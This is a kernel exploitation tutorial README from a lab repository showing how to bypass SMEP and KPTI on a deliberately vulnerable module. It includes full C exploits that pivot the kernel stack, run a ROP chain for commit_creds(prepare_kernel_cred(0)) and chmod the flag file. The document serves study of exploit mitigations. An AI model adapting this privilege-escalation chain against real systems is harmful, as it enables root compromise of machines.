Skip to content
Branch: master
Find file History
Permalink
Type Name Latest commit message Commit time
..
Failed to load latest commit information.
exploit finished rop Nov 6, 2019
image
src added gadgadget finding methods Nov 5, 2019
README.md Fix typo in README.md Nov 7, 2019
cr4.png added gadgadget finding methods Nov 5, 2019
kpti.png added working exploit bypassing kpti Nov 6, 2019
size.png added gadgadget finding methods Nov 5, 2019

README.md

SMEP + KPTI bypass

This time we are going to enable KPTI and SMEP and see how we can bypass these protections. First let's check out what these exploit mitigations do.

SMEP

SMEP is an acronym for Supervisor Mode Execution Prevention. Basically it prevents ret2usr by preventing the kernel from executing code in userspace.

You can check how SMEP is enabled in many ways. First, check out the results of cat /proc/cpuinfo | grep smep. If there are any matches, then SMEP is enabled.

Second, check out the bootscript of the qemu vm. In the previous lab, the boot script was this.

#!/bin/sh

qemu-system-x86_64 -initrd initramfs.cpio \
-kernel bzImage \
-append 'console=ttyS0 oops=panic panic=1 nokaslr' \
-monitor /dev/null \
-m 64M --nographic \
-smp cores=1,threads=1 \

However, if we add the following arguments to the boot script, SMEP becomes enabled.

#!/bin/sh

qemu-system-x86_64 -initrd initramfs.cpio \
-kernel bzImage \
-append 'console=ttyS0 oops=panic panic=1 nokaslr' \
-monitor /dev/null \
-m 64M --nographic \
-smp cores=1,threads=1 \
-cpu kvm64,smep

It's very obvious that under SMEP, our exploit does not work.

The third way to check if SMEP is enabled is by viewing the contents of the CR4 register. Either by causing a crash or attaching the kernel to a debugger, we can get the value of CR4.

[   24.335329] CR2: 000000000deacfd6 CR3: 0000000002b82000 CR4: 00000000001006f0

alt text

The 20th bit of the CR4 register indicates the SMEP flag, and we can validate that it is turned on (1<<20 == 0x100000).

KPTI

KPTI stands for Kernel Page Table Isolation. Its purpose is to mitigate meltdown in the linux kernel. Its main feature is to switch page tables when switching mode from kernel to user and vice versa, so that userspace page tables only have minimal kernel addresses in them.

But in KPTI, all userspace pages are mapped NX (not executable) in kernel page tables. This achieves something very similar to SMEP.

There are two ways to check if KPTI is enabled. The first way is to check out cat /proc/cpuinfo | grep pti. Notice that under the qemu argument -cpu kvm64,smep pti is enabled as well.

The second way is to inspect the page table of a process. However, to do this you need to be capable of 'view'ing physical memory. A kernel arbitrary read primitive is sufficient. All physical pages 0 ~ MAX are mapped to virtual address page_offset_base ~ page_offset_base + MAX. If you want to know why, read this material.

Also, if you have no background information in memory management and multilevel paging in linux, you should read this, or else everything below will not make any sense to you.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/fcntl.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/stat.h>

#define VULN_READ 0x1111
#define VULN_WRITE 0x2222
#define VULN_STACK 0x3333
#define VULN_PGD 0x4444

/* Request descriptor passed to the vulnerable module's ioctl:
 *   kaddr  - kernel address to read from / write to
 *   uaddr  - userspace buffer to copy to / from
 *   length - number of bytes to transfer
 */
struct rwRequest {
	void *kaddr;
	void *uaddr;
	size_t length;
};

/* Base of the kernel's direct physical mapping (physmap): physical page N
 * lives at pageOffsetBase + N*0x1000.  Constant here because the VM boots
 * with nokaslr -- NOTE(review): must be re-leaked if KASLR is on. */
unsigned long pageOffsetBase = 0xffff888000000000;

/* open() wrapper: returns the descriptor, aborts the exploit on failure. */
int Open(char *fname, int mode) {
	int fd = open(fname, mode);
	if (fd < 0) {
		perror("open");
		exit(-1);
	}
	return fd;
}

/*
 * Write one 8-byte value to kernel address `kaddr` through the module's
 * arbitrary-write ioctl (VULN_WRITE).  Aborts the process on failure.
 * Opens /dev/vuln per call and now closes it again -- the original
 * leaked one file descriptor on every invocation.
 */
void write64(unsigned long kaddr, unsigned long value) {

	struct rwRequest req;
	unsigned long value_ = value;

	req.uaddr = &value_;
	req.length = 8;
	req.kaddr = (void *)kaddr;

	int fd = Open("/dev/vuln", O_RDONLY);

	if (ioctl(fd, VULN_WRITE, &req) < 0) {
		perror("ioctl");
		exit(-1);
	}
	close(fd);	/* fix: was leaked, one fd per call */
}

/*
 * Read one 8-byte value from kernel address `kaddr` through the module's
 * arbitrary-read ioctl (VULN_READ).  Aborts the process on failure.
 * Closes its descriptor (the original leaked one fd per call).
 */
unsigned long read64(unsigned long kaddr) {

	struct rwRequest req;
	unsigned long value;	/* fix: stray ';;' removed */

	req.uaddr = &value;
	req.length = 8;
	req.kaddr = (void *)kaddr;

	int fd = Open("/dev/vuln", O_RDONLY);

	if (ioctl(fd, VULN_READ, &req) < 0) {
		perror("ioctl");
		exit(-1);
	}
	close(fd);	/* fix: was leaked, one fd per call */
	return value;
}

/*
 * Ask the module (VULN_STACK) to copy the current kernel stack address
 * into userspace and return it.  Closes its descriptor (the original
 * leaked one fd per call).
 */
unsigned long leak_stack() {
	struct rwRequest req;
	unsigned long stack;

	int fd = Open("/dev/vuln", O_RDONLY);

	req.uaddr = &stack;
	if (ioctl(fd, VULN_STACK, &req) < 0) {
		perror("ioctl");
		exit(-1);
	}
	close(fd);	/* fix: was leaked */

	return stack;
}

/*
 * Ask the module (VULN_PGD) for the kernel virtual address of the current
 * process's top-level page directory (current->mm->pgd).  Closes its
 * descriptor (the original leaked one fd per call).
 */
unsigned long leak_pgd() {
	struct rwRequest req;
	unsigned long pgd;

	int fd = Open("/dev/vuln", O_RDONLY);

	req.uaddr = &pgd;
	if (ioctl(fd, VULN_PGD, &req) < 0) {
		perror("ioctl");
		exit(-1);
	}
	close(fd);	/* fix: was leaked */

	return pgd;
}

/*
 * Software page-table walk: given the (kernel virtual) address of the
 * top-level page directory and a user virtual address, follow all four
 * levels through the physmap using the kernel read primitive and return
 * the kernel virtual address of the final PTE.
 *
 * The (entry >> 12) & 0x3fffffff mask keeps a 30-bit page-frame number,
 * which also strips the low flag bits and the NX bit (bit 63) -- plenty
 * for this 64MB VM.
 * NOTE(review): assumes 4-level paging with 4KB pages at every level
 * (no 2MB/1GB huge-page entries) -- confirm for the target kernel.
 */
unsigned long pageTableWalk(unsigned long pgdir, unsigned long vaddr) {

	unsigned long index1 = (vaddr >> 39) & 0x1ff;	/* PGD index */
	unsigned long index2 = (vaddr >> 30) & 0x1ff;	/* PUD index */
	unsigned long index3 = (vaddr >> 21) & 0x1ff;	/* PMD index */
	unsigned long index4 = (vaddr >> 12) & 0x1ff;	/* PTE index */

	printf("index1: %lx, index2: %lx, index3: %lx index4: %lx\n", index1, index2, index3, index4);
	
	unsigned long lv1 = read64(pgdir + index1*8);
	if (!lv1) {
		printf("[!] lv1 is invalid\n");
		exit(-1);
	}
	printf("lv1: %lx\n", lv1);
	unsigned long lv2 = read64((((lv1 >> 12) & 0x3fffffff) << 12) + pageOffsetBase + index2*8);
	if (!lv2) {
		printf("[!] lv2 is invalid\n");
		exit(-1);
	}
	printf("lv2: %lx\n", lv2);
	
	unsigned long lv3 = read64((((lv2 >> 12) & 0x3fffffff) << 12) + pageOffsetBase + index3*8);
	if (!lv3) {
		printf("[!] lv3 is invalid\n");
		exit(-1);
	}
	printf("lv3: %lx\n", lv3);

	unsigned long lv4 = read64((((lv3 >> 12) & 0x3fffffff) << 12) + pageOffsetBase + index4*8);
	if (!lv4) {
		printf("[!] lv4 is invalid\n");	/* fix: message said "lv3" */
		exit(-1);
	}
	printf("lv4: %lx\n", lv4);
	
	/* Physmap alias of the target page (useful for direct data access). */
	unsigned long vaddr_alias = (((lv4 >> 12) & 0x3fffffff) << 12) + pageOffsetBase;
	printf("vaddr alias page: %p\n", (void *)vaddr_alias);
	/* Kernel virtual address of the PTE itself -- same slot lv4 was read from. */
	unsigned long pte_addr = (((lv3 >> 12) & 0x3fffffff) << 12) + pageOffsetBase + index4*8;
	printf("pte address: %p\n", (void *)pte_addr);
	
	return pte_addr;
}

/*
 * Demo driver for pageTableWalk(): map RWX / RW / R-only pages, touch
 * each one so demand paging actually backs it with a physical frame,
 * then leak the PGD and dump each mapping's PTE via the kernel read
 * primitive to compare the permission bits.
 */
int main (int argc, char **argv){
	
	void *rwx = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
	if (rwx == MAP_FAILED) {
		perror("mmap");
		exit(-1);
	}

	void *rw = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
	if (rw == MAP_FAILED) {
		perror("mmap");
		exit(-1);
	}

	void *r = mmap(NULL, 0x1000, PROT_READ, MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
	if (r == MAP_FAILED) {
		perror("mmap");
		exit(-1);
	}

	/* Touch every page so the page-fault handler installs a PTE.
	 * The read-only page is read through a volatile lvalue -- fix:
	 * a plain dead read could be optimized away entirely, leaving
	 * the page unmapped and the walk failing. */
	memset(rwx, 0xcc, 0x1000);
	memset(rw, 0xcc, 0x1000);
	volatile char a = ((char *)r)[0];
	(void)a;

	unsigned long pgd = leak_pgd();

	printf("[*] page directory is at: %p\n", (void *)pgd);

	unsigned long rwx_pte = pageTableWalk(pgd, (unsigned long)rwx);
	unsigned long rw_pte = pageTableWalk(pgd, (unsigned long)rw);
	unsigned long r_pte = pageTableWalk(pgd, (unsigned long)r);

	printf("[*] RWX: %016lx\n", read64(rwx_pte));
	printf("[*] RW : %016lx\n", read64(rw_pte));
	printf("[*] R  : %016lx\n", read64(r_pte));
	
	return 0;
}

The code above is a helper script to find the address of the PTE (Page Table Entry) of a certain virtual address, when PGD is provided. So I decided to add the primitive of leaking the pgd in my vulnerable kernel module.

Also one thing to be very cautious about is to make sure all the mmap'ed pages are touched at least once, or else they will not be mapped to RAM. This is because of a mechanism called demand paging, which means physical memory is mapped in the page fault handler. Before a page fault occurs, the kernel only stores information about that mapping and the actual mapping is not done.

if (cmd == 0x4444) {
		// return the top level page directory
		void *pgd = current_task->mm->pgd;
		if (copy_from_user(&req, (void *)arg, sizeof(req))) {
			printk(KERN_ERR "invalid address in pgd leak");
			return -EFAULT;
		}

		if (copy_to_user(req.uaddr, &pgd, sizeof(pgd))) {
			printk(KERN_ERR "invalid address in pgd leak");
			return -EFAULT;
		}
	}

Now using the page table walker, let's check out if userspace pages are actually all marked NX.

[*] RWX: 0000000001c19067
[*] RW : 8000000001c1a067
[*] R  : 80000000028a5225

Interestingly, PTE (lowest level entry)'s NX bit is not set. However, the PGDE (lv1)'s NX bit were set for all pages.

lv1: 8000000002b7b067

This design is much more reasonable, because the overhead of marking all PTEs is much larger than marking the NX bit on the PGDE. This is because user pages share a PGDE thanks to the multilevel hierarchy. By the way, if we turn off SMEP/KPTI it shows

lv1: 2b37067

which explains why ret2usr attacks work. (The NX bit is not set)

Getting ROP

The bypass for kernel SMEP/KPTI is analogous to NX bypass in userspace, which is ROP (return oriented programming). Triggering ROP in kernelspace requires a stack pivot, which is done by a stack pivot gadget. The basic idea is to place a ROP chain in a mmap'ed address and change the stack pointer to that address.

To find gadgets, we must first decompress the bzImage file. bzImage is a compressed version of the kernel image, so in order to find gadgets we need to decompress it using this script. It is included in the image directory, so to decompress the bzImage just do ./extract-vmlinux.sh bzImage > vmlinux.

Then run ROPgadget on vmlinux. ROPgadget --binary vmlinux > gadgets

It will take a long time because a kernel image is huge, unlike userspace programs. The number of gadgets is substantial.

alt text

The gadget here seems like a very nice stack pivot. 0xffffffff8149f601 : mov esp, 0xf7000000 ; ret

So we mmap the page 0xf7000000 and write an address to it. In this demo, we write the address 0xdeadbeefcafebebe.

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/fcntl.h>
#include <sys/mman.h>
#include <sys/stat.h>

#define VULN_READ 0x1111
#define VULN_WRITE 0x2222
#define VULN_STACK 0x3333
#define VULN_PGD 0x4444

/* Request descriptor passed to the vulnerable module's ioctl:
 *   kaddr  - kernel address to read from / write to
 *   uaddr  - userspace buffer to copy to / from
 *   length - number of bytes to transfer
 */
struct rwRequest {
	void *kaddr;
	void *uaddr;
	size_t length;
};

/* Base of the kernel's direct physical map (valid with nokaslr). */
unsigned long pageOffsetBase = 0xffff888000000000;

/* open() wrapper: returns the descriptor, aborts the exploit on failure. */
int Open(char *fname, int mode) {
	int fd;
	if ((fd = open(fname, mode)) < 0) {
		perror("open");
		exit(-1);
	}
	return fd;
}

/* Arbitrary 8-byte kernel write via VULN_WRITE.  Closes its fd
 * (the original leaked one descriptor per call). */
void write64(unsigned long kaddr, unsigned long value) {

	struct rwRequest req;
	unsigned long value_ = value;

	req.uaddr = &value_;
	req.length = 8;
	req.kaddr = (void *)kaddr;

	int fd = Open("/dev/vuln", O_RDONLY);

	if (ioctl(fd, VULN_WRITE, &req) < 0) {
		perror("ioctl");
		exit(-1);
	}
	close(fd);
}

/* Arbitrary 8-byte kernel read via VULN_READ.  Closes its fd. */
unsigned long read64(unsigned long kaddr) {

	struct rwRequest req;
	unsigned long value;	/* fix: stray ';;' removed */

	req.uaddr = &value;
	req.length = 8;
	req.kaddr = (void *)kaddr;

	int fd = Open("/dev/vuln", O_RDONLY);

	if (ioctl(fd, VULN_READ, &req) < 0) {
		perror("ioctl");
		exit(-1);
	}
	close(fd);
	return value;
}

/*
 * Stack-pivot demo: map the user page the "mov esp, 0xf7000000 ; ret"
 * gadget points at, plant a marker value as the first fake return
 * address, overwrite the module's function pointer with the gadget,
 * then trigger it via open().  The kernel should crash with
 * RIP = 0xdeadbeefcafebebe, proving the pivot works.
 */
int main (int argc, char **argv){

	// 0xffffffff8149f601 : mov esp, 0xf7000000 ; ret
	unsigned long *fake_stack = mmap((void *)0xf7000000, 0x1000,
			PROT_READ|PROT_WRITE|PROT_EXEC,
			MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED, -1, 0);
	if (fake_stack == MAP_FAILED) {
		perror("mmap");
		exit(-1);
	}

	// writing also touches the page so it is really mapped
	fake_stack[0] = 0xdeadbeefcafebebe;
	write64(0xffffffffc0002068, 0xffffffff8149f601);
	open("/dev/vuln", O_RDONLY);

	return 0;
}

The result is as expected.

[    7.678699] Call Trace:
[    7.679076]  <#DF>
[    7.679633]  dump_stack+0x46/0x5b
[    7.679735]  panic+0xca/0x218
[    7.679820]  df_debug+0x24/0x30
[    7.679899]  do_double_fault+0x95/0x120
[    7.679976]  double_fault+0x1e/0x30
[    7.680225] RIP: 0010:0xdeadbeefcafebebe
[    7.680410] Code: Bad RIP value.
[    7.680509] RSP: 0018:00000000f7000008 EFLAGS: 00000282
[    7.680670] RAX: ffffffff8149f601 RBX: ffffffffc0002480 RCX: ffff888003330920
[    7.680881] RDX: ffff888003ac8c40 RSI: ffff888003b8e800 RDI: ffff888002af25b8
[    7.681075] RBP: 0000000000000039 R08: 0000000000000000 R09: 0000000000000000
[    7.681285] R10: ffffc9000080fcc8 R11: 0000000000000000 R12: ffff888003b8e800
[    7.681510] R13: ffff888002af25b8 R14: ffffffffc0002000 R15: ffff888003b8e800

So it is confirmed that we have a ROP primitive now, what should we do?

Using ROP to get root

There are two ways, the dirty-and-easy way for CTFs (2) and a reliable way for real-world situations (1).

1. commit_creds(prepare_kernel_cred(0)) -> return to user safely via swapgs and iret
2. commit_creds(prepare_kernel_cred(0)) -> chmod 777 flag -> msleep(0x10000) while another process reads the flag

We are going to try out the dirty-and-easy way first.

Easy way: chmod 777 /flag

The 'semantics' of our ROP should be this

 1. RDI <- 0
 2. CALL PREPARE_KERNEL_CRED (0xffffffff8107c0a0)
 3. RDI <- RAX
 4. CALL COMMIT_CREDS (0xffffffff8107bd20)
 5. RDI <- 0xffffff9c
 6. RSI <- "flag"
 7. RDX <- 0777
 8. CALL CHMOD_INTERNAL (0xffffffff811a1b50)
 9. RDI <- 0x1000000
10. CALL MSLEEP (0xffffffff810c4730)

If you don't grasp what chmod_internal is, refer to the README in the ret2usr tutorial.

In exploit code it is this:

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/fcntl.h>
#include <sys/mman.h>
#include <sys/stat.h>

#define VULN_READ 0x1111
#define VULN_WRITE 0x2222
#define VULN_STACK 0x3333
#define VULN_PGD 0x4444

/* Request descriptor passed to the vulnerable module's ioctl:
 *   kaddr  - kernel address to read from / write to
 *   uaddr  - userspace buffer to copy to / from
 *   length - number of bytes to transfer
 */
struct rwRequest {
	void *kaddr;
	void *uaddr;
	size_t length;
};

/* Base of the kernel's direct physical map (valid with nokaslr). */
unsigned long pageOffsetBase = 0xffff888000000000;

/* open() wrapper: returns the descriptor, aborts the exploit on failure. */
int Open(char *fname, int mode) {
	int fd;
	if ((fd = open(fname, mode)) < 0) {
		perror("open");
		exit(-1);
	}
	return fd;
}

/* Arbitrary 8-byte kernel write via VULN_WRITE.  Closes its fd
 * (the original leaked one descriptor per call). */
void write64(unsigned long kaddr, unsigned long value) {

	struct rwRequest req;
	unsigned long value_ = value;

	req.uaddr = &value_;
	req.length = 8;
	req.kaddr = (void *)kaddr;

	int fd = Open("/dev/vuln", O_RDONLY);

	if (ioctl(fd, VULN_WRITE, &req) < 0) {
		perror("ioctl");
		exit(-1);
	}
	close(fd);
}

/* Arbitrary 8-byte kernel read via VULN_READ.  Closes its fd. */
unsigned long read64(unsigned long kaddr) {

	struct rwRequest req;
	unsigned long value;	/* fix: stray ';;' removed */

	req.uaddr = &value;
	req.length = 8;
	req.kaddr = (void *)kaddr;

	int fd = Open("/dev/vuln", O_RDONLY);

	if (ioctl(fd, VULN_READ, &req) < 0) {
		perror("ioctl");
		exit(-1);
	}
	close(fd);
	return value;
}

/* Leak the current kernel stack address (VULN_STACK).  Closes its fd. */
unsigned long leak_stack() {
	struct rwRequest req;
	unsigned long stack;

	int fd = Open("/dev/vuln", O_RDONLY);

	req.uaddr = &stack;
	if (ioctl(fd, VULN_STACK, &req) < 0) {
		perror("ioctl");
		exit(-1);
	}
	close(fd);

	return stack;
}

/* Leak the current process's top-level page directory (VULN_PGD).
 * Closes its fd. */
unsigned long leak_pgd() {
	struct rwRequest req;
	unsigned long pgd;

	int fd = Open("/dev/vuln", O_RDONLY);

	req.uaddr = &pgd;
	if (ioctl(fd, VULN_PGD, &req) < 0) {
		perror("ioctl");
		exit(-1);
	}
	close(fd);

	return pgd;
}


/*
 * First ROP attempt: pivot the kernel stack to 0xf7000000, run
 * commit_creds(prepare_kernel_cred(0)), chmod("/flag", 0777) and
 * msleep() so another process can read the flag.
 * (As explained below, the push_rax gadget lives in an NX page, so
 * this version oopses -- it is kept to document the failed attempt.)
 */
int main (int argc, char **argv){
	
	// 0xffffffff8149f601 : mov esp, 0xf7000000 ; ret
	unsigned long gadget = 0xffffffff8149f601;

	// 0xffffffff81001219 : pop rdi ; ret 
	unsigned long pop_rdi = 0xffffffff81001219;

	// 0xffffffff81001a5c : pop rsi ; ret
	unsigned long pop_rsi = 0xffffffff81001a5c;

	// 0xffffffff81042ef7 : pop rdx ; ret
	unsigned long pop_rdx = 0xffffffff81042ef7;

	//0xffffffff828b16ec : push rax ; jmp rsi
	unsigned long push_rax = 0xffffffff828b16ec;

	// 0xffffffff81023771 : pop rax ; ret
	unsigned long pop_rax = 0xffffffff81023771;

	unsigned long commit_creds = 0xffffffff8107bd20;
	unsigned long prepare_kernel_cred = 0xffffffff8107c0a0;
	unsigned long chmod_internal = 0xffffffff811a1b50;
	unsigned long msleep = 0xffffffff810c4730;

	/* The chain starts one page into the mapping, i.e. exactly at
	 * 0xf7000000, where the pivot gadget points RSP. */
	int i = 0x1000/8;

	/* Map one guard page below the pivot address too: kernel code
	 * called from the chain pushes below RSP.
	 * fix: (void *)0xf7000000-0x1000 was arithmetic on void*
	 * (a GNU extension); compute the address as an integer first. */
	unsigned long *pivot_stack = mmap((void *)(0xf7000000 - 0x1000), 0x2000, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED, -1, 0);
	if (pivot_stack == MAP_FAILED) {
		perror("mmap");
		exit(-1);
	}
	
	/*
	 1. RDI <- 0
	 2. CALL PREPARE_KERNEL_CRED (0xffffffff8107c0a0)
	 3. RDI <- RAX
	 4. CALL COMMIT_CREDS (0xffffffff8107bd20)
	 5. RDI <- 0xffffff9c
	 6. RSI <- "flag"
	 7. RDX <- 0777
	 8. CALL CHMOD_INTERNAL (0xffffffff811a1b50)
	 9. RDI <- 0x1000000
	10. CALL MSLEEP (0xffffffff810c4730)
	*/
	/* (fix: steps 2 and 4 had the COMMIT_CREDS / PREPARE_KERNEL_CRED
	 * labels swapped relative to the addresses and the actual chain) */

	char *flag_str = "/flag";

	// touch the first page so that it doesn't fault
	pivot_stack[0] = 0xcafedeadbeef;

	pivot_stack[i++] = pop_rdi;
	pivot_stack[i++] = 0;
	pivot_stack[i++] = prepare_kernel_cred;
	pivot_stack[i++] = pop_rsi;
	pivot_stack[i++] = pop_rax;
	pivot_stack[i++] = push_rax;
	pivot_stack[i++] = commit_creds;

	pivot_stack[i++] = pop_rdi;
	pivot_stack[i++] = 0xffffff9c;	/* AT_FDCWD */
	pivot_stack[i++] = pop_rsi;
	pivot_stack[i++] = (unsigned long)flag_str;	/* fix: missing cast */
	pivot_stack[i++] = pop_rdx;
	pivot_stack[i++] = 0777;
	pivot_stack[i++] = chmod_internal;

	pivot_stack[i++] = pop_rdi;
	pivot_stack[i++] = 0x1000000;
	pivot_stack[i++] = msleep;


	write64(0xffffffffc0002068, gadget);
	open("/dev/vuln", O_RDONLY);

	return 0;
}

There are two things to be cautious of. First, mmap'ed pages are not in the page table before they are accessed. If you don't 'touch' the pages they will cause a double fault in the kernel. Second, the pivot stack must be wide in both directions due to kernel function calls (ex. commit_creds) as they use the stack and not allocating memory before vaddr 0xf7000000 will cause an uncatchable page fault. Using MAP_GROWSDOWN does not work, as they are for userspace stack growth and thus not catchable in kernel space.

Now if we execute this something very interesting pops up.

/ $ [    6.688926] kernel tried to execute NX-protected page - exploit attempt? (uid: 1000)
[    6.689337] BUG: unable to handle kernel paging request at ffffffff828b16ec
[    6.689682] PGD 220c067 P4D 220c067 PUD 220d063 PMD 30bb063 PTE 80000000028b1063
[    6.690234] Oops: 0011 [#1] SMP PTI
[    6.690572] CPU: 0 PID: 1034 Comm: runme Tainted: P           O      4.19.76 #1
[    6.691218] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1ubuntu1 04/01/2014
[    6.691829] RIP: 0010:0xffffffff828b16ec

It says the push_rax gadget is in an NX page. So ROPgadget literally threw shit gadgets at us, as it does not check page permissions when finding gadgets. So we must find other gadgets that are actually inside legit code segments. For this we should check which regions are RX and specify that range as an argument to ROPgadget.

So first, readelf -S vmlinux to check RX pages, then pass it as an argument to ROPgadget. ROPgadget --binary vmlinux --range 0xffffffff81000000-0xffffffff81c031d4 > gadgets

Since we couldn't use the pop rax gadget, we use this instead to write a chain for the semantic RDI<-RAX.

0xffffffff810cf971 : mov rdi, rax ; jne 0xffffffff810cf959 ; ret

But before it we must make sure that JNE doesn't branch, so we use this gadget to set the flags appropriately.

0xffffffff8147a56e : cmp rdx, 8 ; jne 0xffffffff8147a55f ; ret

So our new exploit is this.

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/fcntl.h>
#include <sys/mman.h>
#include <sys/stat.h>

#define VULN_READ 0x1111
#define VULN_WRITE 0x2222
#define VULN_STACK 0x3333
#define VULN_PGD 0x4444

/* Request descriptor passed to the vulnerable module's ioctl:
 *   kaddr  - kernel address to read from / write to
 *   uaddr  - userspace buffer to copy to / from
 *   length - number of bytes to transfer
 */
struct rwRequest {
	void *kaddr;
	void *uaddr;
	size_t length;
};

/* Base of the kernel's direct physical map (valid with nokaslr). */
unsigned long pageOffsetBase = 0xffff888000000000;

/* open() wrapper: returns the descriptor, aborts the exploit on failure. */
int Open(char *fname, int mode) {
	int fd;
	if ((fd = open(fname, mode)) < 0) {
		perror("open");
		exit(-1);
	}
	return fd;
}

/* Arbitrary 8-byte kernel write via VULN_WRITE.  Closes its fd
 * (the original leaked one descriptor per call). */
void write64(unsigned long kaddr, unsigned long value) {

	struct rwRequest req;
	unsigned long value_ = value;

	req.uaddr = &value_;
	req.length = 8;
	req.kaddr = (void *)kaddr;

	int fd = Open("/dev/vuln", O_RDONLY);

	if (ioctl(fd, VULN_WRITE, &req) < 0) {
		perror("ioctl");
		exit(-1);
	}
	close(fd);
}

/* Arbitrary 8-byte kernel read via VULN_READ.  Closes its fd. */
unsigned long read64(unsigned long kaddr) {

	struct rwRequest req;
	unsigned long value;	/* fix: stray ';;' removed */

	req.uaddr = &value;
	req.length = 8;
	req.kaddr = (void *)kaddr;

	int fd = Open("/dev/vuln", O_RDONLY);

	if (ioctl(fd, VULN_READ, &req) < 0) {
		perror("ioctl");
		exit(-1);
	}
	close(fd);
	return value;
}

/* Leak the current kernel stack address (VULN_STACK).  Closes its fd. */
unsigned long leak_stack() {
	struct rwRequest req;
	unsigned long stack;

	int fd = Open("/dev/vuln", O_RDONLY);

	req.uaddr = &stack;
	if (ioctl(fd, VULN_STACK, &req) < 0) {
		perror("ioctl");
		exit(-1);
	}
	close(fd);

	return stack;
}

/* Leak the current process's top-level page directory (VULN_PGD).
 * Closes its fd. */
unsigned long leak_pgd() {
	struct rwRequest req;
	unsigned long pgd;

	int fd = Open("/dev/vuln", O_RDONLY);

	req.uaddr = &pgd;
	if (ioctl(fd, VULN_PGD, &req) < 0) {
		perror("ioctl");
		exit(-1);
	}
	close(fd);

	return pgd;
}

/*
 * Working ROP exploit: pivot the kernel stack to 0xf7000000, run
 * commit_creds(prepare_kernel_cred(0)), chmod("/flag", 0777) and then
 * msleep() for a long time so another process can read the flag.
 * All gadgets are taken from the kernel's executable range only
 * (the earlier push_rax gadget was in an NX page).
 */
int main (int argc, char **argv){
	
	// 0xffffffff8149f601 : mov esp, 0xf7000000 ; ret
	unsigned long gadget = 0xffffffff8149f601;

	// 0xffffffff81001219 : pop rdi ; ret 
	unsigned long pop_rdi = 0xffffffff81001219;

	// 0xffffffff81001a5c : pop rsi ; ret
	unsigned long pop_rsi = 0xffffffff81001a5c;

	// 0xffffffff81042ef7 : pop rdx ; ret
	unsigned long pop_rdx = 0xffffffff81042ef7;

	// 0xffffffff810cf971 : mov rdi, rax ; jne 0xffffffff810cf959 ; ret
	unsigned long mov_rdi_rax = 0xffffffff810cf971;

	// 0xffffffff8147a56e : cmp rdx, 8 ; jne 0xffffffff8147a55f ; ret
	// (sets ZF so the jne in mov_rdi_rax falls through to ret)
	unsigned long cmp = 0xffffffff8147a56e;

	unsigned long commit_creds = 0xffffffff8107bd20;
	unsigned long prepare_kernel_cred = 0xffffffff8107c0a0;
	unsigned long chmod_internal = 0xffffffff811a1b50;
	unsigned long msleep = 0xffffffff810c4730;

	/* The chain starts one page into the mapping, i.e. exactly at
	 * 0xf7000000, where the pivot gadget points RSP. */
	int i = 0x1000/8;

	/* Map one guard page below the pivot address too: kernel code
	 * called from the chain pushes below RSP.
	 * fix: (void *)0xf7000000-0x1000 was arithmetic on void*
	 * (a GNU extension); compute the address as an integer first. */
	unsigned long *pivot_stack = mmap((void *)(0xf7000000 - 0x1000), 0x2000, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED, -1, 0);
	if (pivot_stack == MAP_FAILED) {
		perror("mmap");
		exit(-1);
	}
	
	/*
	 1. RDI <- 0
	 2. CALL PREPARE_KERNEL_CRED (0xffffffff8107c0a0)
	 3. RDI <- RAX
	 4. CALL COMMIT_CREDS (0xffffffff8107bd20)
	 5. RDI <- 0xffffff9c
	 6. RSI <- "flag"
	 7. RDX <- 0777
	 8. CALL CHMOD_INTERNAL (0xffffffff811a1b50)
	 9. RDI <- 0x1000000
	10. CALL MSLEEP (0xffffffff810c4730)
	*/

	char *flag_str = "/flag";

	// touch the first page so that it doesn't fault
	pivot_stack[0] = 0xcafedeadbeef;

	pivot_stack[i++] = pop_rdi;
	pivot_stack[i++] = 0;
	pivot_stack[i++] = prepare_kernel_cred;
	pivot_stack[i++] = pop_rdx;
	pivot_stack[i++] = 8;		/* make cmp rdx, 8 set ZF */
	pivot_stack[i++] = cmp;
	pivot_stack[i++] = mov_rdi_rax;
	pivot_stack[i++] = commit_creds;

	pivot_stack[i++] = pop_rdi;
	pivot_stack[i++] = 0xffffff9c;	/* AT_FDCWD */
	pivot_stack[i++] = pop_rsi;
	pivot_stack[i++] = (unsigned long)flag_str;	/* fix: missing cast */
	pivot_stack[i++] = pop_rdx;
	pivot_stack[i++] = 0777;
	pivot_stack[i++] = chmod_internal;

	pivot_stack[i++] = pop_rdi;
	pivot_stack[i++] = 0x1000000;
	pivot_stack[i++] = msleep;


	write64(0xffffffffc0002068, gadget);
	open("/dev/vuln", O_RDONLY);

	return 0;
}

And by the way, to debug our ROP, we should attach a debugger, and set a breakpoint on the stack pivot gadget (0xffffffff8149f601: mov esp, 0xf7000000 ; ret). This is what it looks like.

─────────────────────────────────[ REGISTERS ]──────────────────────────────────
 RAX  0xffffffff8149f601 ◂— 0x8008c3f7000000bc
 RBX  0xffffffffc0002480 ◂— 0x39 /* '9' */
 RCX  0xffff888003376920 —▸ 0xffff888002c04540 ◂— add    byte ptr [rax], al /* 0x200200000 */
 RDX  0xffff8880031abd40 ◂— 0
 RDI  0xffff888002b225b8 ◂— mov    dh, 0x21 /* 0xd21b6 */
 RSI  0xffff888003eecf00 ◂— 0
 R8   0x0
 R9   0x0
 R10  0xffffc900000afcc8 ◂— 0x0
 R11  0x0
 R12  0xffff888003eecf00 ◂— 0
 R13  0xffff888002b225b8 ◂— mov    dh, 0x21 /* 0xd21b6 */
 R14  0xffffffffc0002000 ◂— 0
 R15  0xffff888003eecf00 ◂— 0
 RBP  0x39
 RSP  0xffffc900000afc60 —▸ 0xffffffff8143f7f2 ◂— 0x74e868391aebc389
